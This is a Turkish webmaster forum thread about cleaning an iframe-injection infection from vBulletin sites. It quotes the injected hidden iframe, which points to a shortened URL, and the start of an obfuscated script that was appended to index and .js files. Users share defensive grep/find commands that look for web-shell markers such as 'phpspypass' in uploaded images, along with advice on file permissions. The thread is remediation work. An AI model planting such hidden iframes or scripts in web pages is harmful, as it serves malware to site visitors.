İframe Enjeksiyon Virüsü tinyurl . com/yf4sxxm

Merhabalar bu iframe virüslerinden artık yoruldum. Sunucumda ki güvenlik ve optimizasyonu tekrar gözden geçirdim ayrıca download alanından güncel dosyalarımı indirdim. Fakat halen javascript dosyalarıma virüs ekleniyor. Ayrıca son 3 gündürde temalarımın headerina

PHP Code:

<iframe width=1·height=1·border=0·frameborder=0·src="http:// tinyurl . com/yf4sxxm"></iframe> 


Bu kod ekleniyor. vBulletin.com'da aldığım cevap vBseodan doğan bir sorun olduğunu güncel sürümü yuklememı ayrıca yazılabılır olan dosyalarımın ıcınde zaco.php ve doit_js.php gibi php dosyalar varsa silmemi söylediler hepsini yaptım. Bu gerçekten zararlı olmaya başladı üyeler artık şikayetçi nerdeyse siteye girmemeye başladılar ve google web yöneticisindede uyarı almaya başladım kötü yazılım bulunduruluyor diye şuanda engelli değilim ama böyle giderse engelleneceğim.

Şimdiden yardımlarınız için teşekkür ederim..

Serverınızda bulunan tüm dosyaları araştırmalısınız. vBSEO içerisinde her hangi bir açık bulunmamaktadır. Serverınızda bulunan zararlı dosyalar varsa bunları temizlemeniz gerekmektedir.

Vbseo sürümünü güncelleyin.
signaturepic
customeprofilepics klasörlerini kontrol edin. .php uzantılı dosyaları silin. işe yarıyor

Emrah bey konu açıklamama bakarsanız onları yaptım.

Serveri tekrardan araştırdım zaten 3 site kurulu serverde hepsini tek tek araştırdım çok zamanı aldı ama sanırım başarılı oldum şuanda virüs yok sitemde.

Teşekkür Ederim.

Kusura bakmayın iframe virüsünü görünce kendi uyguladıklarımı yazıyorum otomatik olarak 3 sitemden temizledim bu şekilde Ama vbseo güncellemeden sorun aşılamıyor maalesef. Bir ara patch yayınlanmıştı o patch bu sorunu çözüyor muhtemelen.
Ek olarak bahsettiğim klasörler içinde sadece zaco.php vs değil hangi isimle olursa olsun .php dosya varsa mutlaka silin.

Originally Posted by ALP

Emrah bey konu açıklamama bakarsanız onları yaptım.

Serveri tekrardan araştırdım zaten 3 site kurulu serverde hepsini tek tek araştırdım çok zamanı aldı ama sanırım başarılı oldum şuanda virüs yok sitemde.

Teşekkür Ederim.

ssh ile login olup aşağıdaki komutlar ile serverınızı aratın ve şüpheli tüm dosyaları temizleyin

.htaccess dosyalarını bulur

Code:

find . -name .htaccess -exec grep -i httpd-php {} \;

şüpheli gif dosyalarını bulur

Code:

find . -regex '.*\.gif$' -exec grep phpspypass {} \;

yukarda mert in dediğini
kullanıcıların tüm gif yüklediği klasörlerde yapacaksın
signaturepic
customeprofilepics
avatarlar falan filan hepsine bakcaksın
sorun vbseo dan kaynaklanıyor yükselticeksin ve
sitendeki açılmış arka kapıları da kaldıracaksın yukarda arkadaşların anlattığı gibi

hatta
find . -regex '.*\.gif$' -exec grep php {} \;
komuduna da bak zararsız bile olsa bikaç ekstra gif silmenin sakıncası yok

ek olarak illa gif değil jpg de yükleniyorsa onlara falan da bak

Teşekkür ederim Mert Bey ;

Taramayı yaptım şuanda öyle bir sorun kalmadı.

Ben Sabahtan beri Bu Virüs Olayıyla Uğraşıyorum Ftp Yi Tamamen Silim Herşeyi Yeniden Yükledim İndex lerin ve .js lerin en alt satırlarında

<script>var O=new Array();var NK=new Date();var kZ='';var a='';function W(){this.uk="";var rL;if(rL!='P')

Yukarıdaki Kodla Başlayan Kodlar Vardı Hepsini Ftp den Temilzedim Ama Hala Siteye Girdiğimde Virüs Uyarısı Alıyorum Bende Bu Kodu Veritabanında Arattım Ve Bir Sürü Tablo İçerisinde Buldu Şimdi Onları Temizleyeceğim Ama Bir Yandan da Temizlemeye Korkuyorum. Yedek te Aldım Neyse Şimdi Sormak İstediğim Soru Bu Virüs Mysql e Nası Bulaşır Genelede Log ve Cache Tablolarında Var.

Yardımlarınızı Bekliyorum.

Bu konuda bizim yapabileceğimiz birşey yok. Bütün talimatlar verilmiştir bunun gerisi size kalmış birşeydir.

Oke Sorunumu Sonunda Çözdüm Sunucu Güvenliğide Yükseltildi İnşallah Bu Durum Tekrarlanmaz.

vbulletin_global.js dosyasına bulaştırılıyordu bende chmod 444 yaptım sorun çözüldü.
Ayrıca mert beyin bahsettiği güvenlik işlemlerini mutlaka uygulayınız.

Ozkan bey chmod 444 yapmanız javascripti çalıştırmanızı engelleyebilir

Sn.Alp , ben ezbere konuşmam da yazmam da , clientscript içindeki vbulletin_global.js dosyasına habire farklı kodlar yazdırılıyordu ,

444 chmod her grup sadece okur , admin in bu dosya üzerinde oynayabilmesi için ya ssh panelle server dan direk çalışmalı yada erişim izinlerini owner a göre ayarlanmalıdır.

chmod u 444 yapılan bir dosyayı da bilinen ftp programları ile silinemez.

Ben bu şekilde tedbir altına aldım sonradan tüm sıkıntılar sona erdi.